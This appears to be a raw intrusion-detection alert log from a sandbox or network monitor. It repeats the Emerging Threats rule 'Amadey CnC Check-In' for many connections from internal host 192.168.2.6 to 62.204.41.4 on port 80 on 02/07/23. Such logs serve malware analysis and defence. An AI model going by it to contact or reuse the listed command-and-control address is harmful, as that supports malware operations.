192.168.2.662.204.41.449962802027700 02/07/23-20:01:58.212789	TCP	2027700	ET TROJAN Amadey CnC Check-In	49962	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450296802027700 02/07/23-20:03:33.595122	TCP	2027700	ET TROJAN Amadey CnC Check-In	50296	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450033802027700 02/07/23-20:02:19.127549	TCP	2027700	ET TROJAN Amadey CnC Check-In	50033	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449873802027700 02/07/23-20:01:32.847820	TCP	2027700	ET TROJAN Amadey CnC Check-In	49873	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450385802027700 02/07/23-20:03:55.477920	TCP	2027700	ET TROJAN Amadey CnC Check-In	50385	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450039802027700 02/07/23-20:02:20.584895	TCP	2027700	ET TROJAN Amadey CnC Check-In	50039	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450128802027700 02/07/23-20:02:48.244683	TCP	2027700	ET TROJAN Amadey CnC Check-In	50128	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450140802027700 02/07/23-20:02:53.167783	TCP	2027700	ET TROJAN Amadey CnC Check-In	50140	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450217802027700 02/07/23-20:03:11.704054	TCP	2027700	ET TROJAN Amadey CnC Check-In	50217	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450051802027700 02/07/23-20:02:23.494295	TCP	2027700	ET TROJAN Amadey CnC Check-In	50051	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450095802027700 02/07/23-20:02:38.620537	TCP	2027700	ET TROJAN Amadey CnC Check-In	50095	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449738802027700 02/07/23-20:00:55.702188	TCP	2027700	ET TROJAN Amadey CnC Check-In	49738	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450184802027700 02/07/23-20:03:03.616190	TCP	2027700	ET TROJAN Amadey CnC Check-In	50184	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450227802027700 02/07/23-20:03:14.108353	TCP	2027700	ET TROJAN Amadey CnC Check-In	50227	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449804802027700 02/07/23-20:01:13.672357	TCP	2027700	ET TROJAN Amadey CnC Check-In	49804	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450316802027700 02/07/23-20:03:38.501751	TCP	2027700	ET TROJAN Amadey CnC Check-In	50316	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450357802027700 02/07/23-20:03:48.563249	TCP	2027700	ET TROJAN Amadey CnC Check-In	50357	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450446802027700 02/07/23-20:04:10.384849	TCP	2027700	ET TROJAN Amadey CnC Check-In	50446	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450405802027700 02/07/23-20:04:00.344097	TCP	2027700	ET TROJAN Amadey CnC Check-In	50405	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449916802027700 02/07/23-20:01:43.294683	TCP	2027700	ET TROJAN Amadey CnC Check-In	49916	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449934802027700 02/07/23-20:01:51.338963	TCP	2027700	ET TROJAN Amadey CnC Check-In	49934	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449827802027700 02/07/23-20:01:19.034168	TCP	2027700	ET TROJAN Amadey CnC Check-In	49827	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449756802027700 02/07/23-20:01:00.094396	TCP	2027700	ET TROJAN Amadey CnC Check-In	49756	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449893802027700 02/07/23-20:01:37.604134	TCP	2027700	ET TROJAN Amadey CnC Check-In	49893	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450156802027700 02/07/23-20:02:57.043867	TCP	2027700	ET TROJAN Amadey CnC Check-In	50156	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450280802027700 02/07/23-20:03:29.633131	TCP	2027700	ET TROJAN Amadey CnC Check-In	50280	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449845802027700 02/07/23-20:01:23.372817	TCP	2027700	ET TROJAN Amadey CnC Check-In	49845	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450061802027700 02/07/23-20:02:27.765974	TCP	2027700	ET TROJAN Amadey CnC Check-In	50061	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450150802027700 02/07/23-20:02:55.620345	TCP	2027700	ET TROJAN Amadey CnC Check-In	50150	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449982802027700 02/07/23-20:02:02.953057	TCP	2027700	ET TROJAN Amadey CnC Check-In	49982	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450268802027700 02/07/23-20:03:26.680608	TCP	2027700	ET TROJAN Amadey CnC Check-In	50268	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450067802027700 02/07/23-20:02:31.198973	TCP	2027700	ET TROJAN Amadey CnC Check-In	50067	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450197802027700 02/07/23-20:03:06.840701	TCP	2027700	ET TROJAN Amadey CnC Check-In	50197	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450423802027700 02/07/23-20:04:04.774413	TCP	2027700	ET TROJAN Amadey CnC Check-In	50423	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450179802027700 02/07/23-20:03:02.638946	TCP	2027700	ET TROJAN Amadey CnC Check-In	50179	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450464802027700 02/07/23-20:04:14.739715	TCP	2027700	ET TROJAN Amadey CnC Check-In	50464	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450138802027700 02/07/23-20:02:52.674592	TCP	2027700	ET TROJAN Amadey CnC Check-In	50138	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450286802027700 02/07/23-20:03:31.095393	TCP	2027700	ET TROJAN Amadey CnC Check-In	50286	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450049802027700 02/07/23-20:02:23.003141	TCP	2027700	ET TROJAN Amadey CnC Check-In	50049	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450245802027700 02/07/23-20:03:18.483828	TCP	2027700	ET TROJAN Amadey CnC Check-In	50245	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450334802027700 02/07/23-20:03:42.924733	TCP	2027700	ET TROJAN Amadey CnC Check-In	50334	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450375802027700 02/07/23-20:03:53.005630	TCP	2027700	ET TROJAN Amadey CnC Check-In	50375	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449817802027700 02/07/23-20:01:16.563418	TCP	2027700	ET TROJAN Amadey CnC Check-In	49817	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450436802027700 02/07/23-20:04:07.968971	TCP	2027700	ET TROJAN Amadey CnC Check-In	50436	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449906802027700 02/07/23-20:01:40.847690	TCP	2027700	ET TROJAN Amadey CnC Check-In	49906	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449728802027700 02/07/23-20:00:53.301055	TCP	2027700	ET TROJAN Amadey CnC Check-In	49728	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450344802027700 02/07/23-20:03:45.384589	TCP	2027700	ET TROJAN Amadey CnC Check-In	50344	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450433802027700 02/07/23-20:04:07.254488	TCP	2027700	ET TROJAN Amadey CnC Check-In	50433	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450191802027700 02/07/23-20:03:05.327791	TCP	2027700	ET TROJAN Amadey CnC Check-In	50191	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449988802027700 02/07/23-20:02:04.410732	TCP	2027700	ET TROJAN Amadey CnC Check-In	49988	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449903802027700 02/07/23-20:01:40.097751	TCP	2027700	ET TROJAN Amadey CnC Check-In	49903	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449725802027700 02/07/23-20:00:52.567467	TCP	2027700	ET TROJAN Amadey CnC Check-In	49725	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449896802027700 02/07/23-20:01:38.330966	TCP	2027700	ET TROJAN Amadey CnC Check-In	49896	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449985802027700 02/07/23-20:02:03.672175	TCP	2027700	ET TROJAN Amadey CnC Check-In	49985	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449814802027700 02/07/23-20:01:15.831910	TCP	2027700	ET TROJAN Amadey CnC Check-In	49814	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450169802027700 02/07/23-20:03:00.200665	TCP	2027700	ET TROJAN Amadey CnC Check-In	50169	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450166802027700 02/07/23-20:02:59.478159	TCP	2027700	ET TROJAN Amadey CnC Check-In	50166	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449750802027700 02/07/23-20:00:58.621945	TCP	2027700	ET TROJAN Amadey CnC Check-In	49750	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449899802027700 02/07/23-20:01:39.123661	TCP	2027700	ET TROJAN Amadey CnC Check-In	49899	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450270802027700 02/07/23-20:03:27.172191	TCP	2027700	ET TROJAN Amadey CnC Check-In	50270	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450255802027700 02/07/23-20:03:20.983533	TCP	2027700	ET TROJAN Amadey CnC Check-In	50255	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450077802027700 02/07/23-20:02:33.659592	TCP	2027700	ET TROJAN Amadey CnC Check-In	50077	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450010802027700 02/07/23-20:02:13.422325	TCP	2027700	ET TROJAN Amadey CnC Check-In	50010	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450258802027700 02/07/23-20:03:21.947679	TCP	2027700	ET TROJAN Amadey CnC Check-In	50258	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450347802027700 02/07/23-20:03:46.099227	TCP	2027700	ET TROJAN Amadey CnC Check-In	50347	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450449802027700 02/07/23-20:04:11.130604	TCP	2027700	ET TROJAN Amadey CnC Check-In	50449	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450420802027700 02/07/23-20:04:04.035367	TCP	2027700	ET TROJAN Amadey CnC Check-In	50420	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449919802027700 02/07/23-20:01:44.090733	TCP	2027700	ET TROJAN Amadey CnC Check-In	49919	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449931802027700 02/07/23-20:01:50.612148	TCP	2027700	ET TROJAN Amadey CnC Check-In	49931	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449801802027700 02/07/23-20:01:12.934086	TCP	2027700	ET TROJAN Amadey CnC Check-In	49801	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449842802027700 02/07/23-20:01:22.668685	TCP	2027700	ET TROJAN Amadey CnC Check-In	49842	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450023802027700 02/07/23-20:02:16.679938	TCP	2027700	ET TROJAN Amadey CnC Check-In	50023	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450372802027700 02/07/23-20:03:52.297867	TCP	2027700	ET TROJAN Amadey CnC Check-In	50372	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449753802027700 02/07/23-20:00:59.355095	TCP	2027700	ET TROJAN Amadey CnC Check-In	49753	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450153802027700 02/07/23-20:02:56.341247	TCP	2027700	ET TROJAN Amadey CnC Check-In	50153	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450242802027700 02/07/23-20:03:17.764359	TCP	2027700	ET TROJAN Amadey CnC Check-In	50242	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450461802027700 02/07/23-20:04:14.005420	TCP	2027700	ET TROJAN Amadey CnC Check-In	50461	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450331802027700 02/07/23-20:03:42.173293	TCP	2027700	ET TROJAN Amadey CnC Check-In	50331	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450194802027700 02/07/23-20:03:06.078733	TCP	2027700	ET TROJAN Amadey CnC Check-In	50194	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450201802027700 02/07/23-20:03:07.797561	TCP	2027700	ET TROJAN Amadey CnC Check-In	50201	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450408802027700 02/07/23-20:04:01.096954	TCP	2027700	ET TROJAN Amadey CnC Check-In	50408	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450112802027700 02/07/23-20:02:42.895840	TCP	2027700	ET TROJAN Amadey CnC Check-In	50112	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450283802027700 02/07/23-20:03:30.376799	TCP	2027700	ET TROJAN Amadey CnC Check-In	50283	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450064802027700 02/07/23-20:02:30.633740	TCP	2027700	ET TROJAN Amadey CnC Check-In	50064	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450319802027700 02/07/23-20:03:39.222800	TCP	2027700	ET TROJAN Amadey CnC Check-In	50319	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449843802027700 02/07/23-20:01:22.907370	TCP	2027700	ET TROJAN Amadey CnC Check-In	49843	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450110802027700 02/07/23-20:02:42.417578	TCP	2027700	ET TROJAN Amadey CnC Check-In	50110	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450171802027700 02/07/23-20:03:00.685944	TCP	2027700	ET TROJAN Amadey CnC Check-In	50171	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450364802027700 02/07/23-20:03:50.279050	TCP	2027700	ET TROJAN Amadey CnC Check-In	50364	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450462802027700 02/07/23-20:04:14.252136	TCP	2027700	ET TROJAN Amadey CnC Check-In	50462	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450012802027700 02/07/23-20:02:13.968224	TCP	2027700	ET TROJAN Amadey CnC Check-In	50012	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450073802027700 02/07/23-20:02:32.709344	TCP	2027700	ET TROJAN Amadey CnC Check-In	50073	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449999802027700 02/07/23-20:02:10.659483	TCP	2027700	ET TROJAN Amadey CnC Check-In	49999	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450459802027700 02/07/23-20:04:13.538198	TCP	2027700	ET TROJAN Amadey CnC Check-In	50459	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449745802027700 02/07/23-20:00:57.394746	TCP	2027700	ET TROJAN Amadey CnC Check-In	49745	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449941802027700 02/07/23-20:01:53.041040	TCP	2027700	ET TROJAN Amadey CnC Check-In	49941	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450401802027700 02/07/23-20:03:59.377764	TCP	2027700	ET TROJAN Amadey CnC Check-In	50401	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450009802027700 02/07/23-20:02:13.165566	TCP	2027700	ET TROJAN Amadey CnC Check-In	50009	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450107802027700 02/07/23-20:02:41.686560	TCP	2027700	ET TROJAN Amadey CnC Check-In	50107	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450205802027700 02/07/23-20:03:08.738599	TCP	2027700	ET TROJAN Amadey CnC Check-In	50205	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450303802027700 02/07/23-20:03:35.307803	TCP	2027700	ET TROJAN Amadey CnC Check-In	50303	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450168802027700 02/07/23-20:02:59.953138	TCP	2027700	ET TROJAN Amadey CnC Check-In	50168	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449938802027700 02/07/23-20:01:52.305588	TCP	2027700	ET TROJAN Amadey CnC Check-In	49938	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450266802027700 02/07/23-20:03:26.196925	TCP	2027700	ET TROJAN Amadey CnC Check-In	50266	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450299802027700 02/07/23-20:03:34.321474	TCP	2027700	ET TROJAN Amadey CnC Check-In	50299	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449778802027700 02/07/23-20:01:04.997293	TCP	2027700	ET TROJAN Amadey CnC Check-In	49778	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449815802027700 02/07/23-20:01:16.077954	TCP	2027700	ET TROJAN Amadey CnC Check-In	49815	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449871802027700 02/07/23-20:01:32.342194	TCP	2027700	ET TROJAN Amadey CnC Check-In	49871	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449773802027700 02/07/23-20:01:04.038338	TCP	2027700	ET TROJAN Amadey CnC Check-In	49773	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449913802027700 02/07/23-20:01:42.565044	TCP	2027700	ET TROJAN Amadey CnC Check-In	49913	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449974802027700 02/07/23-20:02:00.945242	TCP	2027700	ET TROJAN Amadey CnC Check-In	49974	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450241802027700 02/07/23-20:03:17.535341	TCP	2027700	ET TROJAN Amadey CnC Check-In	50241	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449876802027700 02/07/23-20:01:33.586090	TCP	2027700	ET TROJAN Amadey CnC Check-In	49876	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450143802027700 02/07/23-20:02:53.873531	TCP	2027700	ET TROJAN Amadey CnC Check-In	50143	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449720802027700 02/07/23-20:00:51.202653	TCP	2027700	ET TROJAN Amadey CnC Check-In	49720	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450045802027700 02/07/23-20:02:22.023470	TCP	2027700	ET TROJAN Amadey CnC Check-In	50045	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450397802027700 02/07/23-20:03:58.395001	TCP	2027700	ET TROJAN Amadey CnC Check-In	50397	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450037802027700 02/07/23-20:02:20.092570	TCP	2027700	ET TROJAN Amadey CnC Check-In	50037	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450233802027700 02/07/23-20:03:15.578132	TCP	2027700	ET TROJAN Amadey CnC Check-In	50233	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449781802027700 02/07/23-20:01:05.723794	TCP	2027700	ET TROJAN Amadey CnC Check-In	49781	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450392802027700 02/07/23-20:03:57.167562	TCP	2027700	ET TROJAN Amadey CnC Check-In	50392	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450434802027700 02/07/23-20:04:07.488023	TCP	2027700	ET TROJAN Amadey CnC Check-In	50434	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449868802027700 02/07/23-20:01:31.598757	TCP	2027700	ET TROJAN Amadey CnC Check-In	49868	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450196802027700 02/07/23-20:03:06.562601	TCP	2027700	ET TROJAN Amadey CnC Check-In	50196	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450238802027700 02/07/23-20:03:16.812392	TCP	2027700	ET TROJAN Amadey CnC Check-In	50238	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450406802027700 02/07/23-20:04:00.598596	TCP	2027700	ET TROJAN Amadey CnC Check-In	50406	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449740802027700 02/07/23-20:00:56.170997	TCP	2027700	ET TROJAN Amadey CnC Check-In	49740	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449810802027700 02/07/23-20:01:15.107347	TCP	2027700	ET TROJAN Amadey CnC Check-In	49810	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449851802027700 02/07/23-20:01:24.881497	TCP	2027700	ET TROJAN Amadey CnC Check-In	49851	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449946802027700 02/07/23-20:01:54.317743	TCP	2027700	ET TROJAN Amadey CnC Check-In	49946	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450311802027700 02/07/23-20:03:37.282022	TCP	2027700	ET TROJAN Amadey CnC Check-In	50311	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450274802027700 02/07/23-20:03:28.142137	TCP	2027700	ET TROJAN Amadey CnC Check-In	50274	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450470802027700 02/07/23-20:04:16.255518	TCP	2027700	ET TROJAN Amadey CnC Check-In	50470	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450020802027700 02/07/23-20:02:15.924236	TCP	2027700	ET TROJAN Amadey CnC Check-In	50020	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450078802027700 02/07/23-20:02:33.896004	TCP	2027700	ET TROJAN Amadey CnC Check-In	50078	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449905802027700 02/07/23-20:01:40.596381	TCP	2027700	ET TROJAN Amadey CnC Check-In	49905	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450369802027700 02/07/23-20:03:51.539852	TCP	2027700	ET TROJAN Amadey CnC Check-In	50369	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450115802027700 02/07/23-20:02:43.638524	TCP	2027700	ET TROJAN Amadey CnC Check-In	50115	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450328802027700 02/07/23-20:03:41.453966	TCP	2027700	ET TROJAN Amadey CnC Check-In	50328	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450439802027700 02/07/23-20:04:08.690442	TCP	2027700	ET TROJAN Amadey CnC Check-In	50439	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450246802027700 02/07/23-20:03:18.721408	TCP	2027700	ET TROJAN Amadey CnC Check-In	50246	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449900802027700 02/07/23-20:01:39.360455	TCP	2027700	ET TROJAN Amadey CnC Check-In	49900	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450148802027700 02/07/23-20:02:55.124323	TCP	2027700	ET TROJAN Amadey CnC Check-In	50148	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449884802027700 02/07/23-20:01:35.347764	TCP	2027700	ET TROJAN Amadey CnC Check-In	49884	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449921802027700 02/07/23-20:01:45.051140	TCP	2027700	ET TROJAN Amadey CnC Check-In	49921	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450421802027700 02/07/23-20:04:04.274057	TCP	2027700	ET TROJAN Amadey CnC Check-In	50421	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449798802027700 02/07/23-20:01:12.233155	TCP	2027700	ET TROJAN Amadey CnC Check-In	49798	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450127802027700 02/07/23-20:02:47.079664	TCP	2027700	ET TROJAN Amadey CnC Check-In	50127	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450454802027700 02/07/23-20:04:12.348170	TCP	2027700	ET TROJAN Amadey CnC Check-In	50454	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450102802027700 02/07/23-20:02:40.427300	TCP	2027700	ET TROJAN Amadey CnC Check-In	50102	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450200802027700 02/07/23-20:03:07.560016	TCP	2027700	ET TROJAN Amadey CnC Check-In	50200	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450356802027700 02/07/23-20:03:48.331429	TCP	2027700	ET TROJAN Amadey CnC Check-In	50356	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449737802027700 02/07/23-20:00:55.466122	TCP	2027700	ET TROJAN Amadey CnC Check-In	49737	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449835802027700 02/07/23-20:01:20.965850	TCP	2027700	ET TROJAN Amadey CnC Check-In	49835	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450163802027700 02/07/23-20:02:58.736661	TCP	2027700	ET TROJAN Amadey CnC Check-In	50163	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450418802027700 02/07/23-20:04:03.565176	TCP	2027700	ET TROJAN Amadey CnC Check-In	50418	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449918802027700 02/07/23-20:01:43.801204	TCP	2027700	ET TROJAN Amadey CnC Check-In	49918	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450098802027700 02/07/23-20:02:39.366201	TCP	2027700	ET TROJAN Amadey CnC Check-In	50098	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450282802027700 02/07/23-20:03:30.132022	TCP	2027700	ET TROJAN Amadey CnC Check-In	50282	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450348802027700 02/07/23-20:03:46.349889	TCP	2027700	ET TROJAN Amadey CnC Check-In	50348	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449830802027700 02/07/23-20:01:19.753947	TCP	2027700	ET TROJAN Amadey CnC Check-In	49830	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450218802027700 02/07/23-20:03:11.936212	TCP	2027700	ET TROJAN Amadey CnC Check-In	50218	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449954802027700 02/07/23-20:01:56.265159	TCP	2027700	ET TROJAN Amadey CnC Check-In	49954	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450135802027700 02/07/23-20:02:51.914333	TCP	2027700	ET TROJAN Amadey CnC Check-In	50135	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450389802027700 02/07/23-20:03:56.428558	TCP	2027700	ET TROJAN Amadey CnC Check-In	50389	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450057802027700 02/07/23-20:02:25.359863	TCP	2027700	ET TROJAN Amadey CnC Check-In	50057	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449729802027700 02/07/23-20:00:53.543429	TCP	2027700	ET TROJAN Amadey CnC Check-In	49729	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450213802027700 02/07/23-20:03:10.733288	TCP	2027700	ET TROJAN Amadey CnC Check-In	50213	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450029802027700 02/07/23-20:02:18.139693	TCP	2027700	ET TROJAN Amadey CnC Check-In	50029	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450467802027700 02/07/23-20:04:15.494809	TCP	2027700	ET TROJAN Amadey CnC Check-In	50467	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450176802027700 02/07/23-20:03:01.908838	TCP	2027700	ET TROJAN Amadey CnC Check-In	50176	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450093802027700 02/07/23-20:02:38.122439	TCP	2027700	ET TROJAN Amadey CnC Check-In	50093	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449926802027700 02/07/23-20:01:49.382340	TCP	2027700	ET TROJAN Amadey CnC Check-In	49926	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449802802027700 02/07/23-20:01:13.174021	TCP	2027700	ET TROJAN Amadey CnC Check-In	49802	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450130802027700 02/07/23-20:02:48.878883	TCP	2027700	ET TROJAN Amadey CnC Check-In	50130	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450384802027700 02/07/23-20:03:55.223735	TCP	2027700	ET TROJAN Amadey CnC Check-In	50384	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449765802027700 02/07/23-20:01:02.096121	TCP	2027700	ET TROJAN Amadey CnC Check-In	49765	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450426802027700 02/07/23-20:04:05.502601	TCP	2027700	ET TROJAN Amadey CnC Check-In	50426	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449807802027700 02/07/23-20:01:14.403500	TCP	2027700	ET TROJAN Amadey CnC Check-In	49807	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450000802027700 02/07/23-20:02:10.893167	TCP	2027700	ET TROJAN Amadey CnC Check-In	50000	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450254802027700 02/07/23-20:03:20.750307	TCP	2027700	ET TROJAN Amadey CnC Check-In	50254	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449848802027700 02/07/23-20:01:24.096025	TCP	2027700	ET TROJAN Amadey CnC Check-In	49848	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449889802027700 02/07/23-20:01:36.602318	TCP	2027700	ET TROJAN Amadey CnC Check-In	49889	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450278802027700 02/07/23-20:03:29.144513	TCP	2027700	ET TROJAN Amadey CnC Check-In	50278	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450024802027700 02/07/23-20:02:16.923135	TCP	2027700	ET TROJAN Amadey CnC Check-In	50024	80	192.168.2.6	62.204.41.4
